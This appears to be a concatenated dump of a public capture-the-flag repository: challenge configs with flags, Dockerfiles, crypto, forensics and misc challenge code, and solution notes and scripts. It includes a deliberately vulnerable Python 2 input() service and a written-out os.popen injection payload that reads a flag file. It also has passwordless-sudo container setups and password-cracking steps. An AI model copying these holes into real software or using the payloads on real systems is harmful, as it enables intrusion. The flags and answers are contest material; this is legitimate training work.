"EXEC:\"timeout -s KILL 10m python3.10 -u /srv/app/run.py\"" ] 14 | # docker build -t 
ecdsa_jail -------------------------------------------------------------------------------- /Challenges/Crypto/ecdsa_jail/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{CVE-2022-21449_psYch1c_sigNatur3s!} -------------------------------------------------------------------------------- /Challenges/Crypto/gggg/challenge.yml: -------------------------------------------------------------------------------- 1 | name: gggg 2 | author: warri 3 | category: crypto 4 | description: | 5 | > So many gs...what even is going on...some twisted sort of RSA perhaps? 6 | 7 | flags: 8 | - blahaj{gr0ups?_iT5_alL_aBout_tH3_cYCL35!} -------------------------------------------------------------------------------- /Challenges/Crypto/gggg/dist/chall.py: -------------------------------------------------------------------------------- 1 | from sage.all import SymmetricGroup, PermutationGroup, random_prime, save 2 | from Crypto.Cipher import AES 3 | from Crypto.Util.Padding import pad 4 | from hashlib import sha256 5 | from SECRET import flag 6 | 7 | gk = random_prime(2**64, 2**65) 8 | g = 2**4 * 5**5 9 | G = SymmetricGroup(g) 10 | gp, gq = G.random_element(), G.random_element() 11 | gn = gp * gq 12 | ge = 0x10001 13 | GG = PermutationGroup([gp, gq]) 14 | gm = GG.random_element() 15 | gc = (gm**gk)**ge 16 | gi = [G.identity()(i) for i in range(g+1)] 17 | 18 | GN = [gn(i) for i in gi[1:]] 19 | GM = [gm(i) for i in GN] 20 | GC = [gc(i) for i in GN] 21 | 22 | enc = AES.new(sha256(str(gk).encode()).digest()[:16], AES.MODE_ECB).encrypt(pad(flag,16)).hex() 23 | 24 | out = {"GN":gn, "GM":gm, "GC":gc, "enc":enc} 25 | save(out, "out.sobj") -------------------------------------------------------------------------------- /Challenges/Crypto/gggg/dist/out.sobj: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Crypto/gggg/dist/out.sobj -------------------------------------------------------------------------------- /Challenges/Crypto/long2bytes/challenge.yml: -------------------------------------------------------------------------------- 1 | name: long2bytes 2 | author: warri 3 | category: crypto 4 | description: It is almost an universal fact that every cryptographer's journey starts with them figuring out how to convert from bytes to integers and vice versa. But what about floats? 5 | 6 | flags: 7 | - blahaj{h3l1o_l4tt1ce_my_0ld_fren} -------------------------------------------------------------------------------- /Challenges/Crypto/otp/challenge.yml: -------------------------------------------------------------------------------- 1 | name: One time pad 2 | author: fern 3 | category: crypto 4 | description: Ever heard of the One-time pad? Surely, you cannot crack this scheme! 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{uNusU4L_InF0_l3AK} 13 | 14 | files: 15 | - dist/chal.py 16 | 17 | connection_info: nc hostname 8000 18 | 19 | state: visible 20 | version: "0.1" 21 | -------------------------------------------------------------------------------- /Challenges/Crypto/otp/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Realize that each character of the encrypted result can be any value EXCEPT the flag character at that position. From there you can just keep requesting the encrypted flag (this typically takes ~1024 - 2048 tries, a reasonable amount), until each character of the flag has been narrowed down to a single candidate. See `solve/` for the solve script. 
--------------------------------------------------------------------------------
/Challenges/Crypto/otp/solve/soln.py:
--------------------------------------------------------------------------------
import base64, string
from pwn import *

# Step 1: ask the local challenge instance for the encrypted flag 2000 times
# and keep every base64 answer it returns.
conn = remote("localhost", 8000)
samples = []
for attempt in range(2000):
    conn.sendlineafter(b"Command:", b"getflag")
    conn.recvuntil(b"is: ")
    encoded = conn.recvline().strip().decode()
    samples.append(encoded)
    print(encoded, attempt)
conn.close()

# Step 2: base64-decode each answer; the charmap codec turns the raw bytes into
# a string so that every position can be read back with ord().
decoded = [base64.b64decode(sample.encode()).decode("charmap") for sample in samples]

# Step 3: per position, list the printable ASCII values (32..126) that never
# showed up in any sample. A single survivor is printed as the recovered
# character; otherwise the remaining candidates are printed as a list.
for pos in range(len(decoded[0])):
    seen = {ord(text[pos]) for text in decoded}
    candidates = [value for value in range(32, 127) if value not in seen]
    if len(candidates) == 1:
        print(chr(candidates[0]), end = "")
    else:
        print([chr(value) for value in candidates])
-------------------------------------------------------------------------------- /Challenges/Crypto/otp/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.8-alpine 3 | 4 | RUN apk update && apk add socat 5 | 6 | COPY ./chal.py /srv/app/run.py 7 | COPY ./entry.sh /srv/app/entry.sh 8 | RUN chmod 555 /srv/app/run.py 9 | RUN chmod 555 /srv/app/entry.sh 10 | 11 | RUN adduser --uid 1001 --disabled-password nonroot 12 | USER 1001 13 | 14 | WORKDIR /srv/app 15 | 16 | CMD [ "/srv/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Crypto/otp/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | otp: 3 | privileged: false 4 | build: . 
5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Crypto/otp/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m python3 /srv/app/run.py" -------------------------------------------------------------------------------- /Challenges/Crypto/pascal/challenge.yml: -------------------------------------------------------------------------------- 1 | name: pascal 2 | author: warri 3 | category: crypto 4 | description: RSA is so old school. Can you defeat this cryptosystem which had appeared in DEFCON quals 2024? 5 | 6 | flags: 7 | - blahaj{pal1i3r?_i_b4rely_kn0w_h3r!} 8 | -------------------------------------------------------------------------------- /Challenges/Crypto/pascal/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{pal1i3r?_i_b4rely_kn0w_h3r!} -------------------------------------------------------------------------------- /Challenges/Crypto/ycloLC/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.10-alpine 3 | 4 | RUN apk update && apk add socat 5 | 6 | RUN pip install pycryptodome 7 | 8 | COPY ./chal.py /srv/app/run.py 9 | RUN chmod 555 /srv/app/run.py 10 | 11 | WORKDIR /srv/app 12 | 13 | CMD [ "socat", "TCP-LISTEN:8000,nodelay,reuseaddr,fork", "EXEC:\"timeout -s KILL 10m python3.10 -u /srv/app/run.py\"" ] -------------------------------------------------------------------------------- /Challenges/Crypto/ycloLC/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | yclolc: 3 | privileged: false 4 | build: . 
5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Executable Challenge/christmas/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Christmas Wi(sh)list 2 | author: samuzora 3 | category: pwn 4 | description: All I want for Christmas is /bin/sh 5 | 6 | flags: 7 | - blahaj{i_h3ar_th0se_sl3igh_sh3lls_r1nging} -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Executable Challenge/christmas/dist/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/EXAMPLES/Executable Challenge/christmas/dist/libc.so.6 -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Executable Challenge/christmas/dist/santa: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/EXAMPLES/Executable Challenge/christmas/dist/santa -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Executable Challenge/christmas/sol/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/EXAMPLES/Executable Challenge/christmas/sol/libc.so.6 -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Executable Challenge/christmas/sol/santa_patched: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/EXAMPLES/Executable Challenge/christmas/sol/santa_patched -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Executable Challenge/christmas/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 2 | 3 | COPY ./flag.txt /srv/app/flag.txt 4 | ADD ./santa /srv/app/run 5 | 6 | RUN chmod 444 /srv/app/flag.txt 7 | RUN chmod +x /srv/app/run 8 | 9 | RUN apt-get update && apt-get install -y socat 10 | 11 | RUN addgroup --gid 1001 nonroot && \ 12 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 13 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 14 | USER 1001 15 | 16 | WORKDIR /srv/app 17 | 18 | CMD [ "socat", "TCP-LISTEN:8000,nodelay,reuseaddr,fork", "EXEC:\"timeout -s KILL 10m /srv/app/run\"" ] 19 | -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Executable Challenge/christmas/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.7' 2 | 3 | services: 4 | christmas: 5 | build: ./ 6 | privileged: false 7 | ports: 8 | - "8000:8000" 9 | -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Executable Challenge/christmas/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{i_h3ar_th0se_sl3igh_sh3lls_r1nging} 2 | -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Executable Challenge/christmas/src/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/EXAMPLES/Executable 
Challenge/christmas/src/libc.so.6 -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Executable Challenge/christmas/src/santa: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/EXAMPLES/Executable Challenge/christmas/src/santa -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Interactive Challenge/Printwriter -1/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Printwriter -1 2 | author: azazo 3 | category: misc 4 | description: | 5 | I'm not very good at C, so I coded this challenge in Python. Don't have Python 3 yet though, so it's a bit slow... At least it can't be pwned now! 6 | 7 | 8 | flags: 9 | - blahaj{0uT_w17h_th3_N3W_4Nd_1N_w1tH_the_Old} -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Interactive Challenge/Printwriter -1/dist/main.py: -------------------------------------------------------------------------------- 1 | import random, time 2 | 3 | while True: 4 | time.sleep(1) 5 | try: 6 | s = raw_input("Print what? ") 7 | i = int(input("How many times? ")) 8 | for round in xrange(i): 9 | print(s) 10 | except Exception as e: 11 | print("Something bad happened :(") 12 | print(e) 13 | -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Interactive Challenge/Printwriter -1/sol/solution.md: -------------------------------------------------------------------------------- 1 | Python 2 does this silly thing where `input()` evaluates the user's input as a Python expression (it is equivalent to `eval(raw_input())`), so the user can execute arbitrary code. Reading the number with `int(raw_input())` instead would avoid this. 2 | 3 | Intended solution path: 4 | 1. Notice that Python 2 is being used 5 | 2. 
Input random stuff and notice that whatever entered for number of times is evaluated 6 | 3. `__import__("os").popen("cat flag.txt").read()` to get flag 7 | 8 | Flag: `blahaj{0uT_w17h_th3_N3W_4Nd_1N_w1tH_the_Old}` 9 | -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Interactive Challenge/Printwriter -1/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu 2 | 3 | COPY ./main.py /srv/app/run 4 | COPY ./flag.txt /srv/app/flag.txt 5 | 6 | RUN chmod +x /srv/app/run 7 | 8 | RUN apt-get update && apt-get install -y socat && apt-get install -y python2.7 9 | 10 | RUN addgroup --gid 1001 nonroot && \ 11 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 12 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 13 | USER 1001 14 | 15 | WORKDIR /srv/app 16 | 17 | CMD [ "socat", "TCP-LISTEN:8000,nodelay,reuseaddr,fork", "EXEC:\"timeout -s KILL 10m python2.7 -u /srv/app/run\"" ] -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Interactive Challenge/Printwriter -1/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{0uT_w17h_th3_N3W_4Nd_1N_w1tH_the_Old} 2 | -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Interactive Challenge/Printwriter -1/src/main.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | 3 | while True: 4 | try: 5 | s = raw_input("Print what? ") 6 | i = int(input("How many times? 
")) 7 | for round in xrange(i): 8 | print(s) 9 | except Exception as e: 10 | print("Something bad happened :(") 11 | print(e) 12 | -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Server Challenge/eXample Sending Service/challenge.yml: -------------------------------------------------------------------------------- 1 | name: eXample Sending Service 2 | author: Halogen 3 | category: web 4 | description: | 5 | > As part of Halogen's cybersecurity exam, Blahaj has to get the flag only accessible by the administrator. But Blahaj cannot even type with his flippers, help him pass! 6 | 7 | # The flag to use 8 | flags: 9 | - blahaj{d1d_y0u_f0rg0r_t0_upd4t3?} -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Server Challenge/eXample Sending Service/dist/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM zenika/alpine-chrome:with-puppeteer 2 | 3 | RUN mkdir app 4 | WORKDIR app 5 | COPY . . 
6 | RUN npm ci 7 | 8 | EXPOSE 3000 9 | CMD ["node","app.js"] -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Server Challenge/eXample Sending Service/dist/flag.txt: -------------------------------------------------------------------------------- 1 | SAMPLE FLAG -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Server Challenge/eXample Sending Service/dist/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "printwriter-3", 3 | "version": "1.0.0", 4 | "description": "PrintWriter :/", 5 | "main": "main.js", 6 | "scripts": { 7 | "test": "echo \\\"Error: no test specified\\\" && exit 1" 8 | }, 9 | "author": "", 10 | "license": "ISC", 11 | "dependencies": { 12 | "dompurify": "^2.0.16", 13 | "ejs": "^3.1.9", 14 | "express": "^4.18.2", 15 | "express-jwt": "^8.4.1", 16 | "jsdom": "^22.1.0", 17 | "jsonwebtoken": "^9.0.2", 18 | "puppeteer": "^21.3.8" 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Server Challenge/eXample Sending Service/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM zenika/alpine-chrome:with-puppeteer 2 | 3 | RUN mkdir app 4 | WORKDIR app 5 | COPY . . 
6 | RUN npm ci 7 | EXPOSE 8000 8 | USER root 9 | RUN addgroup --gid 1001 nonroot && \ 10 | adduser --uid 1001 -G nonroot --disabled-password --gecos "" nonroot && \ 11 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 12 | USER 1001 13 | CMD ["node","app.js"] -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Server Challenge/eXample Sending Service/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{d1d_y0u_f0rg0r_t0_upd4t3?} -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Server Challenge/eXample Sending Service/src/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "printwriter-3", 3 | "version": "1.0.0", 4 | "description": "PrintWriter :/", 5 | "main": "main.js", 6 | "scripts": { 7 | "test": "echo \\\"Error: no test specified\\\" && exit 1" 8 | }, 9 | "author": "", 10 | "license": "ISC", 11 | "dependencies": { 12 | "dompurify": "^2.0.16", 13 | "ejs": "^3.1.9", 14 | "express": "^4.18.2", 15 | "express-jwt": "^8.4.1", 16 | "jsdom": "^22.1.0", 17 | "jsonwebtoken": "^9.0.2", 18 | "puppeteer": "^21.3.8" 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /Challenges/Forensics/README.md: -------------------------------------------------------------------------------- 1 | Forensics Challenges -------------------------------------------------------------------------------- /Challenges/Forensics/audiofile/dist/chal.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Forensics/audiofile/dist/chal.wav -------------------------------------------------------------------------------- /Challenges/Forensics/audiofile/solution.md: 
-------------------------------------------------------------------------------- 1 | Open in spectrogram, and view the flag. 2 | 3 | Flag: `blahaj{h1Dd3N_In_AuD10}` -------------------------------------------------------------------------------- /Challenges/Forensics/bigzip/dist/chal.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Forensics/bigzip/dist/chal.zip -------------------------------------------------------------------------------- /Challenges/Forensics/bigzip/solution.md: -------------------------------------------------------------------------------- 1 | Intended solve: 2 | Most of the zip files are stored with the STORE method (no compression), which makes things very easy as you can just blast away the layers. I used 10000 STOREs for each DEFLATE. Script in `solve`. Script runs in <1 min on my (quite potato) machine. 3 | 4 | Funny solve: 5 | Write a script to actually unzip each layer with `7z` in a loop. I actually calculated this will take a minimum of 40h when making the chal, making it unusable. 
6 | 7 | Flag: `blahaj{z1p5_AlL_tH3_W4Y}` -------------------------------------------------------------------------------- /Challenges/Forensics/bigzip/solution/soln.py: -------------------------------------------------------------------------------- 1 | import zipfile 2 | import io 3 | 4 | with open("r.zip", "rb") as f: 5 | file_bytes = f.read() 6 | while True: 7 | if file_bytes.startswith(b"PK\x03\x04\x14\x00\x00\x00\x08\x00"): #hunt for deflates 8 | zfile = zipfile.ZipFile(io.BytesIO(file_bytes), "r") 9 | print(zfile.infolist(), len(file_bytes)) 10 | file_bytes = zfile.read(zfile.infolist()[0]) 11 | else: 12 | file_bytes2 = file_bytes[35000:][:-73000] #blast away stores 1000 at a time 13 | if len(file_bytes2) == 0: #we found the flag, hit the end of the chain 14 | zfile = zipfile.ZipFile(io.BytesIO(file_bytes), "r") 15 | print(zfile.infolist(), len(file_bytes)) 16 | file_bytes = zfile.read(zfile.infolist()[0]) 17 | print("FLAG:", file_bytes) 18 | break 19 | file_bytes = file_bytes2 -------------------------------------------------------------------------------- /Challenges/Forensics/corruptedimage/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "corrupted image" 2 | author: "scuffed" 3 | category: forensics 4 | description: My friend sent me an artwork he made but the file seems to be corrupted :( Please fix it for me... 
5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{F4K3_1M6} 13 | 14 | files: 15 | - dist/fix_me.jpg 16 | 17 | state: visible 18 | 19 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Forensics/corruptedimage/dist/fix_me.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Forensics/corruptedimage/dist/fix_me.jpg -------------------------------------------------------------------------------- /Challenges/Forensics/corruptedimage/solution.md: -------------------------------------------------------------------------------- 1 | Identify that it's a PNG and not JPG, then fix the magic bytes 2 | Flag: `blahaj{F4K3_1M6}` -------------------------------------------------------------------------------- /Challenges/Forensics/corruptedimage/solution/untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Forensics/corruptedimage/solution/untitled.png -------------------------------------------------------------------------------- /Challenges/Forensics/dataexpunged/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "[DATA EXPUNGED]" 2 | author: "scuffed" 3 | category: forensics 4 | description: A recent breach of the Subliminal Undetectable Systems Institute (SUS Institute) has led to gigabytes of top secret documents being leaked online! However, some of these documents remain redacted... help unveil the secrets that the SUS Institute are trying to hide! 
5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{not_so_private_nor_confidential} 13 | 14 | files: 15 | - dist/exfiltrated.pdf 16 | 17 | state: visible 18 | 19 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Forensics/dataexpunged/dist/exfiltrated.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Forensics/dataexpunged/dist/exfiltrated.pdf -------------------------------------------------------------------------------- /Challenges/Forensics/dataexpunged/solution.md: -------------------------------------------------------------------------------- 1 | Either extract all images from the PDF or just delete the black rectangles in some PDF editor. 2 | 3 | Flag: `blahaj{not_so_private_nor_confidential}` -------------------------------------------------------------------------------- /Challenges/Forensics/imetthedata/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "i met the data" 2 | author: "scuffed" 3 | category: forensics 4 | description: Look, if you had one shot or one opportunity. To store some data in an image in one moment. Would you capture it or just let it slip? Yo. His palms are sweaty, knees weak, arms are heavy. There's vomit on his sweater already, mom's spaghetti. 
5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{i_can_rhyme_orange_with_banana} 13 | 14 | files: 15 | - dist/flag.jpg 16 | 17 | state: visible 18 | 19 | version: "0.1" 20 | -------------------------------------------------------------------------------- /Challenges/Forensics/imetthedata/dist/flag.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Forensics/imetthedata/dist/flag.jpg -------------------------------------------------------------------------------- /Challenges/Forensics/imetthedata/solution.md: -------------------------------------------------------------------------------- 1 | exiftool all parts of the flag 2 | 3 | Flag: `blahaj{i_can_rhyme_orange_with_banana}` -------------------------------------------------------------------------------- /Challenges/Forensics/keylogger/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "keylogger" 2 | author: "scuffed" 3 | category: forensics 4 | description: "I've decided to install a keylogger on my friend's computer to find out some of his secrets! However, I don't know how to read the output of the keylogger??" 
5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{stop_reading_my_messages} 13 | 14 | files: 15 | - dist/log.pcapng 16 | 17 | state: visible 18 | 19 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Forensics/keylogger/dist/log.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Forensics/keylogger/dist/log.pcapng -------------------------------------------------------------------------------- /Challenges/Forensics/keylogger/solution.md: -------------------------------------------------------------------------------- 1 | - Find the SSLKEYLOGFILE with FTK imager to be able to decode TLS from pcap 2 | - Get the zip file from the pcap 3 | - Hashcat the password 4 | 5 | Flag: `blahaj{why_was_that_envvar_set}` -------------------------------------------------------------------------------- /Challenges/Forensics/memory/solution.md: -------------------------------------------------------------------------------- 1 | commands to run to solve: 2 | - .\vol2.exe -f .\dmp.raw imageinfo to get the profile 3 | - .\vol2.exe -f .\dmp.raw --profile Win7SP1x86_23418 pslist to get the process 4 | - .\vol2.exe -f .\dmp.raw --profile Win7SP1x86_23418 consoles to get the command 5 | - .\vol2.exe -f .\dmp.raw --profile Win7SP1x86_23418 printkey -K "ControlSet001\Control\ComputerName\ComputerName" to get the computer name 6 | 7 | Flag: `blahaj{M3M0R1ESDUMP3DM3M0R1ESR34D}` -------------------------------------------------------------------------------- /Challenges/Forensics/significantbites/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "significant bites" 2 | author: "scuffed" 3 | category: forensics 4 | description: My friend sent me this photo of an apple that she took a 
few bites out of. Doesn't it look cool? On top of that, she says that she's hidden a message in this photo somehow... 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{1_W4N73D_70_S33_73H_w0rLD_1N_c0L0R} 13 | 14 | files: 15 | - dist/bad_apple.PNG 16 | 17 | state: visible 18 | 19 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Forensics/significantbites/dist/bad_apple.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Forensics/significantbites/dist/bad_apple.PNG -------------------------------------------------------------------------------- /Challenges/Forensics/significantbites/solution.md: -------------------------------------------------------------------------------- 1 | LSB, probably solvable with AperiSolve. 2 | 3 | Flag: `blahaj{1_W4N73D_70_S33_73H_w0rLD_1N_c0L0R}` -------------------------------------------------------------------------------- /Challenges/Forensics/trashcanstroll/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "Trashcan Stroll" 2 | author: "scuffed" 3 | category: forensics 4 | description: Behold, a suspiciously large JPG file! 
5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{RubbI5h_on_Th3_MoV3} 13 | 14 | files: 15 | - dist/silly.jpg 16 | 17 | state: visible 18 | 19 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Forensics/trashcanstroll/dist/silly.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Forensics/trashcanstroll/dist/silly.jpg -------------------------------------------------------------------------------- /Challenges/Forensics/trashcanstroll/solution.md: -------------------------------------------------------------------------------- 1 | binwalk oneshot 2 | 3 | Flag: `blahaj{RubbI5h_on_Th3_MoV3}` -------------------------------------------------------------------------------- /Challenges/Forensics/wireshonk/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "wireshonk" 2 | author: "scuffed" 3 | category: forensics 4 | description: "Keylogging isn't enough for me! I've decided to create a whole forensic dump of my friend's computer in hopes of extracting a super secret design that he received. 
From what I've heard, the design is even password protected with some super secret 6 digit code...\n\nLink to forensic dump: challenge here: https://drive.google.com/drive/folders/1Kyd216ASWkK-XY96IZeOaac7ZH7NK1Uy?usp=sharing\n\n Mirror link (if the above isn't working): https://drive.google.com/drive/folders/1RYyXWeSSbS_EjWrq43vuE00DN6JoWYHr?usp=sharing" 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{why_was_that_envvar_set} 13 | 14 | state: visible 15 | 16 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Forensics/wireshonk/solution.md: -------------------------------------------------------------------------------- 1 | - Find the SSLKEYLOGFILE with FTK imager to be able to decode TLS from pcap 2 | - Get the zip file from the pcap 3 | - Hashcat the password 4 | 5 | Flag: `blahaj{why_was_that_envvar_set}` -------------------------------------------------------------------------------- /Challenges/Misc/1110101111011010/challenege.yml: -------------------------------------------------------------------------------- 1 | name: 1110101111011010 2 | author: FS 3 | category: misc 4 | description: | 5 | > beeeep beeeep beeeep beep beeeep beep beeeep beeeep beeeep beeeep beep beeeep beeeep beep beeeep beep. 
(Take note that sample rate of audio is 44.1kHz and duration of each beep is 0.01s) 6 | 7 | flags: 8 | - blahaj{On3s_aNd_z3ros_mAk3_tH3_wHole_w0rLd_rUN_aRouNd} 9 | -------------------------------------------------------------------------------- /Challenges/Misc/1110101111011010/dist/secret.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/1110101111011010/dist/secret.wav -------------------------------------------------------------------------------- /Challenges/Misc/1110101111011010/sol.md: -------------------------------------------------------------------------------- 1 | placeholder 2 | -------------------------------------------------------------------------------- /Challenges/Misc/1110101111011010/solve/solve.py: -------------------------------------------------------------------------------- 1 | from scipy.io.wavfile import read 2 | import numpy as np 3 | 4 | def read_audio(file): 5 | sample_rate,data=read(file) 6 | return sample_rate,data 7 | 8 | def calc_freq(signal_chunk,sample_rate): 9 | zero_crossing=np.where(np.diff(np.signbit(signal_chunk)))[0] 10 | num_crossing=len(zero_crossing) 11 | duration=len(signal_chunk)/sample_rate 12 | estimated_freq=num_crossing/(2*duration) 13 | return estimated_freq 14 | 15 | sample_rate,modulated_wave=read_audio("hidden.wav") 16 | sample_rate=44100 17 | duration=0.01 18 | 19 | bits="" 20 | 21 | for i in range(0,len(modulated_wave),int(sample_rate*duration)): 22 | chunk=modulated_wave[i:i+441] 23 | detected_freq=calc_freq(chunk,sample_rate) 24 | if (detected_freq==float(950)): 25 | bits+="1" 26 | else: 27 | bits+="0" 28 | 29 | data=''.join([chr(int(bits[i:i+8],2)) for i in range(0,len(bits),8)]) 30 | print(data) -------------------------------------------------------------------------------- /Challenges/Misc/README.md: 
-------------------------------------------------------------------------------- 1 | Misc Challenges -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Shikanokonokonoko 2 | author: hartmannsyg 3 | category: misc 4 | description: I almost went insane testing this. しかのこのこのここしたんたんしかのこのこのここしたんたんしかのこのこのここしたんたんしかのこのこのここしたんたんしかのこのこのここしたんたんしかのこのこのここしたんたんしかのこのこのここしたんたんしかのこのこのここしたんたん. 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{my_d33r_Fr13nd_N0k0tAn} 13 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/dist/.gitignore: -------------------------------------------------------------------------------- 1 | # See https://help.github.com/articles/ignoring-files/ for more about ignoring files. 2 | 3 | # dependencies 4 | /node_modules 5 | /.pnp 6 | .pnp.js 7 | .yarn/install-state.gz 8 | 9 | # testing 10 | /coverage 11 | 12 | # next.js 13 | /.next/ 14 | /out/ 15 | 16 | # production 17 | /build 18 | 19 | # misc 20 | .DS_Store 21 | *.pem 22 | 23 | # debug 24 | npm-debug.log* 25 | yarn-debug.log* 26 | yarn-error.log* 27 